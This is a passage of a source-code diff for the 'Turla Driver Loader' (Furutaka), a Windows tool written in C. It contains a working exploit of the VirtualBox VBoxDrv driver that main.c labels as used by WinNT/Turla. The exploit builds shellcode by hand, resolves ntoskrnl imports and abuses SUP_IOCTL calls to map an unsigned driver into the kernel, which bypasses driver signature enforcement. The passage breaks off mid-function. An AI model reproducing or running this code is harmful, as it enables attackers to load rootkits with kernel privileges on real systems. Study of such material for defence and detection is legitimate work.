<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

64
Source/Furutaka/cui.c Normal file
View File

@ -0,0 +1,64 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: CUI.C
*
* VERSION: 1.00
*
* DATE: 18 Jan 2016
*
* Console output.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* cuiPrintText
*
* Purpose:
*
* Output text to the console or file.
*
*/
VOID cuiPrintText(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPWSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
consoleIO = _strlen(Buffer);
if (ConsoleOutputEnabled == TRUE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer);
}
}

28
Source/Furutaka/cui.h Normal file
View File

@ -0,0 +1,28 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: CUI.H
*
* VERSION: 1.00
*
* DATE: 18 Jan 2016
*
* Common header file for console ui.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#include "global.h"
VOID cuiPrintText(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);

Binary file not shown.

50
Source/Furutaka/global.h Normal file
View File

@ -0,0 +1,50 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: GLOBAL.H
*
* VERSION: 1.00
*
* DATE: 01 Feb 2016
*
* Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#include <Windows.h>
#include <ntstatus.h>
#include "ntos.h"
#include "minirtl\minirtl.h"
#include "minirtl\rtltypes.h"
#include "minirtl\cmdline.h"
#include "sup.h"
#include "cui.h"
#include "instdrv.h"
#if !defined UNICODE
#error ANSI build is not supported
#endif
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif

265
Source/Furutaka/instdrv.c Normal file
View File

@ -0,0 +1,265 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon
*
* TITLE: INSTDRV.C
*
* VERSION: 1.11
*
* DATE: 01 Feb 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* scmInstallDriver
*
* Purpose:
*
* Create SCM service entry describing kernel driver.
*
*/
BOOL scmInstallDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
)
{
SC_HANDLE schService;
schService = CreateService(SchSCManager, // SCManager database
DriverName, // name of service
DriverName, // name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_KERNEL_DRIVER, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
ServiceExe, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL // no password
);
if (schService == NULL) {
return FALSE;
}
CloseServiceHandle(schService);
return TRUE;
}
/*
* scmStartDriver
*
* Purpose:
*
* Start service, resulting in SCM drvier load.
*
*/
BOOL scmStartDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
SC_HANDLE schService;
BOOL ret;
schService = OpenService(SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if (schService == NULL)
return FALSE;
ret = StartService(schService, 0, NULL)
|| GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
CloseServiceHandle(schService);
return ret;
}
/*
* scmOpenDevice
*
* Purpose:
*
* Open driver device by symbolic link.
*
*/
BOOL scmOpenDevice(
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
)
{
TCHAR completeDeviceName[64];
HANDLE hDevice;
RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
hDevice = CreateFile(completeDeviceName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return FALSE;
if (lphDevice) {
*lphDevice = hDevice;
}
else {
CloseHandle(hDevice);
}
return TRUE;
}
/*
* scmStopDriver
*
* Purpose:
*
* Command SCM to stop service, resulting in driver unload.
*
*/
BOOL scmStopDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
INT iRetryCount;
SC_HANDLE schService;
BOOL ret;
SERVICE_STATUS serviceStatus;
ret = FALSE;
schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
if (schService == NULL) {
return ret;
}
iRetryCount = 5;
do {
SetLastError(0);
ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
if (ret == TRUE)
break;
if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
break;
Sleep(1000);
iRetryCount--;
} while (iRetryCount);
CloseServiceHandle(schService);
return ret;
}
/*
* scmRemoveDriver
*
* Purpose:
*
* Remove service entry from SCM database.
*
*/
BOOL scmRemoveDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
SC_HANDLE schService;
BOOL bResult = FALSE;
schService = OpenService(SchSCManager,
DriverName,
DELETE
);
if (schService == NULL) {
return bResult;
}
bResult = DeleteService(schService);
CloseServiceHandle(schService);
return bResult;
}
/*
* scmUnloadDeviceDriver
*
* Purpose:
*
* Combines scmStopDriver and scmRemoveDriver.
*
*/
BOOL scmUnloadDeviceDriver(
_In_ LPCTSTR Name
)
{
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
if (Name == NULL) {
return bResult;
}
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager) {
scmStopDriver(schSCManager, Name);
bResult = scmRemoveDriver(schSCManager, Name);
CloseServiceHandle(schSCManager);
}
return bResult;
}
/*
* scmLoadDeviceDriver
*
* Purpose:
*
* Unload if already exists, Create, Load and Open driver instance.
*
*/
BOOL scmLoadDeviceDriver(
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
)
{
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
if (Name == NULL) {
return bResult;
}
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager) {
scmRemoveDriver(schSCManager, Name);
scmInstallDriver(schSCManager, Name, Path);
scmStartDriver(schSCManager, Name);
bResult = scmOpenDevice(Name, lphDevice);
CloseServiceHandle(schSCManager);
}
return bResult;
}

54
Source/Furutaka/instdrv.h Normal file
View File

@ -0,0 +1,54 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon
*
* TITLE: INSTDRV.H
*
* VERSION: 1.10
*
* DATE: 10 Mar 2015
*
* Common header file for the program SCM usage.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
BOOL scmInstallDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
);
BOOL scmStartDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmOpenDevice(
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
);
BOOL scmStopDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmRemoveDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmUnloadDeviceDriver(
_In_ LPCTSTR Name
);
BOOL scmLoadDeviceDriver(
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
);

838
Source/Furutaka/main.c Normal file
View File

@ -0,0 +1,838 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MAIN.C
*
* VERSION: 1.00
*
* DATE: 04 Feb 2016
*
* Furutaka entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include <process.h>
#include "vbox.h"
#include "shellcode.h"
#pragma data_seg("shrd")
volatile LONG g_lApplicationInstances = 0;
#pragma data_seg()
#pragma comment(linker, "/Section:shrd,RWS")
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
HANDLE g_hVBox = INVALID_HANDLE_VALUE;
BOOL g_ConsoleOutput = FALSE;
BOOL g_VBoxInstalled = FALSE;
WCHAR BE = 0xFEFF;
#define VBoxDrvSvc TEXT("VBoxDrv")
#define supImageName "furutaka"
#define supImageHandle 0x1a000
#define PAGE_SIZE 0x1000
#define scDataOffset 0x214 //shellcode data offset
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.0 (04/02/16)")
#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n")
#define T_LOADERRUN TEXT("Another instance running, close it before\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.0.0 started\r\n(c) 2016 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
/*
* TDLVBoxInstalled
*
* Purpose:
*
* Check VirtualBox software installation state.
*
*/
BOOL TDLVBoxInstalled(
VOID
)
{
BOOL bPresent = FALSE;
LRESULT lRet;
HKEY hKey = NULL;
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"),
0, KEY_READ, &hKey);
bPresent = (hKey != NULL);
if (hKey) {
RegCloseKey(hKey);
}
return bPresent;
}
/*
* TDLRelocImage
*
* Purpose:
*
* Process image relocs.
*
*/
void TDLRelocImage(
ULONG_PTR Image,
ULONG_PTR NewImageBase
)
{
PIMAGE_OPTIONAL_HEADER popth;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader;
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)NewImageBase - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
}
/*
* TDLGetProcAddress
*
* Purpose:
*
* Get NtOskrnl procedure address.
*
*/
ULONG_PTR TDLGetProcAddress(
ULONG_PTR KernelBase,
ULONG_PTR KernelImage,
LPCSTR FunctionName
)
{
ANSI_STRING cStr;
ULONG_PTR pfn = 0;
RtlInitString(&cStr, FunctionName);
if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn)))
return 0;
return KernelBase + (pfn - KernelImage);
}
/*
* TDLResolveKernelImport
*
* Purpose:
*
* Resolve import (ntoskrnl only).
*
*/
void TDLResolveKernelImport(
ULONG_PTR Image,
ULONG_PTR KernelImage,
ULONG_PTR KernelBase
)
{
PIMAGE_OPTIONAL_HEADER popth;
ULONG_PTR ITableVA, *nextthunk;
PIMAGE_IMPORT_DESCRIPTOR ITable;
PIMAGE_THUNK_DATA pthunk;
PIMAGE_IMPORT_BY_NAME pname;
ULONG i;
popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader;
if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT)
return;
ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
if (ITableVA == 0)
return;
ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA);
if (ITable->OriginalFirstThunk == 0)
pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk);
else
pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk);
for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) {
nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk);
if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) {
pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData);
nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name);
}
else
nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff));
}
}
/*
* TDLExploit
*
* Purpose:
*
* VirtualBox exploit used by WinNT/Turla.
*
*/
void TDLExploit(
LPVOID Shellcode,
ULONG CodeSize
)
{
SUPCOOKIE Cookie;
SUPLDROPEN OpenLdr;
DWORD bytesIO = 0;
RTR0PTR ImageBase = NULL;
ULONG_PTR paramOut;
PSUPLDRLOAD pLoadTask = NULL;
SUPSETVMFORFAST vmFast;
SUPLDRFREE ldrFree;
SIZE_T memIO;
WCHAR text[256];
while (g_hVBox != INVALID_HANDLE_VALUE) {
RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE));
Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE;
Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN;
Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT;
Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
Cookie.Hdr.rc = 0;
Cookie.u.In.u32ReqVersion = 0;
Cookie.u.In.u32MinVersion = 0x00070002;
RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC));
if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE,
&Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie,
SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE);
break;
}
RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr));
OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN;
OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT;
OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
OpenLdr.Hdr.rc = 0;
OpenLdr.u.In.cbImage = CodeSize;
RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName));
if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr,
SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr,
SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x"));
u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
ImageBase = OpenLdr.u.Out.pvImageBase;
memIO = PAGE_SIZE + CodeSize;
NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pLoadTask == NULL)
break;
pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
pLoadTask->Hdr.cbIn =
(ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize;
pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT;
pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC;
pLoadTask->Hdr.rc = 0;
pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0;
pLoadTask->u.In.pvImageBase = ImageBase;
pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle;
pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase;
pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase;
pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase;
RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize);
pLoadTask->u.In.cbImage = CodeSize;
if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD,
pLoadTask, pLoadTask->Hdr.cbIn,
pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase, _strend(text));
_strcat(text, TEXT(", size = 0x"));
ultohex(CodeSize, _strend(text));
_strcat(text, TEXT("\r\n\tDriver image mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
RtlSecureZeroMemory(&vmFast, sizeof(vmFast));
vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
vmFast.Hdr.rc = 0;
vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN;
vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT;
vmFast.u.In.pVMR0 = (LPVOID)supImageHandle;
if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST,
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN,
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE);
break;
}
else {
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE);
}
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE);
paramOut = 0;
DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP,
NULL, 0,
&paramOut, sizeof(paramOut), &bytesIO, NULL);
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE);
RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree));
ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN;
ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT;
ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
ldrFree.Hdr.rc = 0;
ldrFree.u.In.pvImageBase = ImageBase;
DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE,
&ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN,
&ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL);
break;
}
if (pLoadTask != NULL) {
memIO = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE);
}
if (g_hVBox != INVALID_HANDLE_VALUE) {
CloseHandle(g_hVBox);
g_hVBox = INVALID_HANDLE_VALUE;
}
}
/*
* TDLMapDriver
*
* Purpose:
*
* Build shellcode and execute exploit.
*
*/
UINT TDLMapDriver(
LPWSTR lpDriverFullName
)
{
UINT result = (UINT)-1;
ULONG isz;
SIZE_T memIO;
ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0;
HMODULE Image = NULL;
PIMAGE_NT_HEADERS FileHeader;
PBYTE Buffer = NULL;
UNICODE_STRING uStr;
ANSI_STRING routineName;
NTSTATUS status;
WCHAR text[256];
KernelBase = supGetNtOsBase();
while (KernelBase != 0) {
_strcpy(text, TEXT("Ldr: Kernel base = 0x"));
u64tohex(KernelBase, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
RtlSecureZeroMemory(&uStr, sizeof(uStr));
RtlInitUnicodeString(&uStr, lpDriverFullName);
status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image);
if ((!NT_SUCCESS(status)) || (Image == NULL)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: Input driver file loaded at 0x"));
u64tohex((ULONG_PTR)Image, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
FileHeader = RtlImageNtHeader(Image);
if (FileHeader == NULL)
break;
isz = FileHeader->OptionalHeader.SizeOfImage;
cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE);
RtlInitUnicodeString(&uStr, L"ntoskrnl.exe");
status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage);
if ((!NT_SUCCESS(status)) || (KernelImage == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x"));
u64tohex(KernelImage, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
RtlInitString(&routineName, "ExAllocatePoolWithTag");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag);
if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x"));
u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread);
if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x"));
u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
memIO = isz + PAGE_SIZE;
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (Buffer == NULL) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: Shellcode allocated at 0x"));
u64tohex((ULONG_PTR)Buffer, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
// mov rcx, ExAllocatePoolWithTag
// mov rdx, PsCreateSystemThread
Buffer[0x00] = 0x48; // mov rcx, xxxxx
Buffer[0x01] = 0xb9;
*((PULONG_PTR)&Buffer[2]) =
KernelBase + (xExAllocatePoolWithTag - KernelImage);
Buffer[0x0a] = 0x48; // mov rdx, xxxxx
Buffer[0x0b] = 0xba;
*((PULONG_PTR)&Buffer[0x0c]) =
KernelBase + (xPsCreateSystemThread - KernelImage);
RtlCopyMemory(Buffer + 0x14,
TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code));
RtlCopyMemory(Buffer + scDataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE);
TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase);
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE);
TDLExploit(Buffer, isz + PAGE_SIZE);
result = 0;
break;
}
if (Buffer != NULL) {
memIO = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE);
}
return result;
}
/*
* TDLStartVulnerableDriver
*
* Purpose:
*
* Load vulnerable virtualbox driver and return handle for it device.
*
*/
HANDLE TDLStartVulnerableDriver(
VOID
)
{
